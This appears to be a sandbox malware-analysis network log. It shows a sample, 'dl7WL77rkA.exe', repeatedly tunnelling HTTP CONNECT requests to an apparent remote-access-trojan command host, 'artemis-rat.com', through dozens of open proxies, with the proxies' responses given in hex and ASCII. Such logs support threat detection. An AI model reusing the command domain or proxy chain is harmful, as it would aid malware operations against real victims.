                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            908192.168.2.55244538.162.23.12731283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.299036026 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.767234087 CET111INHTTP/1.1 407 Proxy Authentication Required
                                                                                                                                                                                                                                                            Proxy-Authenticate: Basic realm=""
                                                                                                                                                                                                                                                            Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
                                                                                                                                                                                                                                                            Data Ascii: Proxy Authentication Required


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            909192.168.2.55241398.162.25.4316543876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.304168940 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            910192.168.2.552448167.172.159.4312583876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.307205915 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.995723009 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.806385994 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            911192.168.2.55247238.54.95.1931283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.312521935 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            912192.168.2.55243198.175.31.19541453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.323419094 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            913192.168.2.55248338.162.31.3131283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.323479891 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.778393030 CET111INHTTP/1.1 407 Proxy Authentication Required
                                                                                                                                                                                                                                                            Proxy-Authenticate: Basic realm=""
                                                                                                                                                                                                                                                            Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
                                                                                                                                                                                                                                                            Data Ascii: Proxy Authentication Required


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            914192.168.2.55243498.170.57.24941453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.329900026 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            915192.168.2.55250938.162.2.19831283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.341048002 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.780633926 CET111INHTTP/1.1 407 Proxy Authentication Required
                                                                                                                                                                                                                                                            Proxy-Authenticate: Basic realm=""
                                                                                                                                                                                                                                                            Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
                                                                                                                                                                                                                                                            Data Ascii: Proxy Authentication Required


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            916192.168.2.552461181.78.19.2499993876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.341085911 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.092415094 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.905277014 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.592744112 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.526220083 CET19INHTTP/1.1 200 OK


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            917192.168.2.552427163.172.158.70163793876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.354537964 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.092545986 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.093033075 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.905309916 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.957741022 CET536INHTTP/1.0 501 Tor is not an HTTP Proxy
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 53 20 50 72 6f 78 79 2c 20 4e 6f 74 20 41 6e 20 48 54 54 50 20 50 72 6f 78 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 73 20 70 72 6f 78 79 2c 20 6e 6f 74 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 3c 2f 68 31 3e 0a 3c 70 3e 0a 49 74 20 61 70 70 65 61 72 73 20 79 6f 75 20 68 61 76 65 20 63 6f 6e 66 69 67 75 72 65 64 20 79 6f 75 72 20 77 65 62 20 62 72 6f 77 73 65 72 20 74 6f 20 75 73 65 20 74 68 69 73 20 54 6f 72 20 70 6f 72 74 20 61 73 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 0a 3c 2f 70 3e 3c 70 3e 0a 54 68 69 73 20 69 73 20 6e 6f 74 20 63 6f 72 72 65 63 74 3a 20 54 68 69 73 20 70 6f 72 74 20 69 73 20 63 6f 6e 66 69 67 75 72 65 64 20 61 73 20 61 20 53 4f 43 4b 53 20 70 72 6f 78 79 2c 20 6e 6f 74 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 20 49 66 20 79 6f 75 20 6e 65 65 64 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 20 74 75 6e 6e 65 6c 2c 20 75 73 65 20 74 68 65 20 48 54 54 50 54 75 6e 6e 65 6c 50 6f 72 74 0a 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 6f 70 74 69 6f 6e 20 69 6e 20 70 6c 61 63 65 20 6f 66 2c 20 6f 72 20 69 6e 20 61 64 64 69 74 69 6f 6e 20 74 6f 2c 20 53 4f 43 4b 53 50 6f 72 74 2e 0a 50 6c 65 61 73 65 20 63 6f 6e 66 69
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port asan HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, notan HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPortconfiguration option in place of, or in addition to, SOCKSPort.Please confi


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            918192.168.2.552540129.213.150.20580803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.365487099 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.581151009 CET59INHTTP/1.1 200 Connection Established
                                                                                                                                                                                                                                                            Proxy-agent: nginx


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            919192.168.2.55198127.65.240.15710803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.367831945 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            920192.168.2.551920192.169.226.96461913876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.368590117 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.405112028 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.405767918 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:53.405402899 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            921192.168.2.550653125.227.225.15733893876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.372380018 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            922192.168.2.552684202.159.107.1374433876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.372889042 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            923192.168.2.552685202.159.107.1374433876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.374914885 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            924192.168.2.55242337.235.48.19803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.376137018 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            925192.168.2.552690202.159.107.1374433876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.376698017 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            926192.168.2.55245218.135.133.11631283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.378084898 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.674093008 CET116INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:41 GMT
                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                            Content-Type: text/plain
                                                                                                                                                                                                                                                            Content-Length: 0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            927192.168.2.552692202.159.107.1374433876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.378237009 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            928192.168.2.55242643.131.245.216156733876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.384699106 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            929192.168.2.551280107.152.98.541453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.386919975 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            930192.168.2.552425120.78.191.225803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.391228914 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.719897032 CET767INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                            Server: Beaver
                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 635
                                                                                                                                                                                                                                                            Connection: close
